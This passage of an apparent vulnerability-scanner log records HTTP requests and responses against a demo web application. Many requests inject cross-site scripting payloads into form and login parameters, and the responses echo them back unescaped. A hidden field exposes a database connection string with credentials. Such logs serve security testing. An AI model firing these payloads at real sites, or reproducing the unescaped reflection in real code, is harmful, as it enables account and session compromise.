<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /error_log/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:30 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=1"style="background:url(javascript:alert('XSS'))"%20"&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/link9/link10/link11/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:32 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=--><script>alert('XSS')</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:57:02 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = --><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = --><script>alert('XSS')</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=>"><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:28 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=">"><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /linking/link1/link2/link3/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:28 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /linking/link1/link2/link3/link4/link5/link6/link7/link8/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:24:31 GMT
Content-Type: text/html
Content-Length: 172
<html><head><title>Directory Listing Denied</title></head>
<body><h1>Directory Listing Denied</h1>This Virtual Directory does not allow contents to be listed.</body></html>GET /_vti_pvt/DocURL.indexOf( HTTP/1.0
Referer: http://zero.webappsecurity.com:80/_vti_pvt/
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 403 Access Forbidden
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:41:44 GMT
Content-Length: 4214
Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html dir=ltr>
<head>
<style>
a:link {font:8pt/11pt verdana; color:FF0000}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<META NAME="ROBOTS" CONTENT="NOINDEX">
<title>The page cannot be displayed</title>
<META HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">
</head>
<script>
function Homepage(){
<!--
// in real bits, urls get returned to our script like this:
// res://shdocvw.dll/http_404.htm#http://www.DocURL.com/bar.htm
//For testing use DocURL = "res://shdocvw.dll/http_404.htm#https://www.microsoft.com/bar.htm"
DocURL=document.URL;
//this is where the http or https will be, as found by searching for :// but skipping the res://
protocolIndex=DocURL.indexOf("://",4);
//this finds the ending slash for the domain server
serverIndex=DocURL.indexOf("/",protocolIndex + 3);
//for the href, we need a valid URL to the domain. We search for the # symbol to find the begining
//of the true URL, and add 1 to skip it - this is the BeginURL value. We use serverIndex as the end marker.
//urlresult=DocURL.substring(protocolIndex - 4,serverIndex);
BeginURL=DocURL.indexOf("#",1) + 1;
urlresult=DocURL.substring(BeginURL,serverIndex);
//for display, we need to skip after http://, and go to the next slash
displayresult=DocURL.substring(protocolIndex + 3 ,serverIndex);
InsertElementAnchor(urlresult, displayresult);
}
function HtmlEncode(text)
{
return text.replace(/&/g, '&').replace(/'/g, '"').replace(/</g, '<').replace(/>/g, '>');
}
function TagAttrib(name, value)
{
return ' '+name+'="'+HtmlEncode(value)+'"';
}
function PrintTag(tagName, needCloseTag, attrib, inner){
document.write( '<' + tagName + attrib + '>' + HtmlEncode(inner) );
if (needCloseTag) document.write( '</' + tagName +'>' );
}
function URI(href)
{
IEVer = window.navigator.appVersion;
IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
GET /login/login.asp?Action=Login&UserName=>"><script>alert("XSS")</script>&Password=333%2D333%2D3333test@test999.com HTTP/1.0
Referer: http://zero.webappsecurity.com:80/login/login.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:53:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 355
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<BODY>
<h1>Invalid username: >"><script>alert("XSS")</script></h1>
<form action=login.asp method=get>
Please login:<br>
Username: <input type=text name=UserName><br>
Password: <input type=password name=Password><br>
<input type=submit value="Login"><br>
<input type=hidden name=Action value="Login"><br>
</form>
</BODY></HTML>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 162
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=dbCCNumbers%3Buid%3Dsa%3Bpassword%3Dscoobydo&txtFirstName=Joe&txtLastName=>"><script>alert("XSS")</script>HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 402
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = >"><script>alert("XSS")</script></P><br>
<P>The <b>hidden</b> parameter "txtHidden" = >"><script>alert("XSS")</script></P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = dbCCNumbers;uid=sa;password=scoobydo</P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
POST /pformresults.asp HTTP/1.0
Referer: http://zero.webappsecurity.com:80/pindex.asp.bak
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
txtHidden=This+was+hidden+from+the+user&dbConnectString=>"><script>alert('XSS')</script>&txtFirstName=Joe&txtLastName=SwinneyHTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:59 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 348
Content-Type: text/html
Cache-control: private
<html>
<body>
<P>The parameter "txtFirstName" = Joe</P>
<P>The parameter "txtLastName" = Swinney</P><br>
<P>The <b>hidden</b> parameter "txtHidden" = Swinney</P><br>
<P>The <b>hidden</b> parameter "dbConnectString" = >"><script>alert('XSS')</script></P><br>
<a href="pindex.asp">Click here to return to index</a>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=1"style="background:url(javascript:alert('XSS'))"%20"&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:24 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4025
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE="1"style="background:url(javascript:alert('XSS'))" ""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
GET /join.asp?name=&email=&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=--><script>alert('XSS')</script>&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:43 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
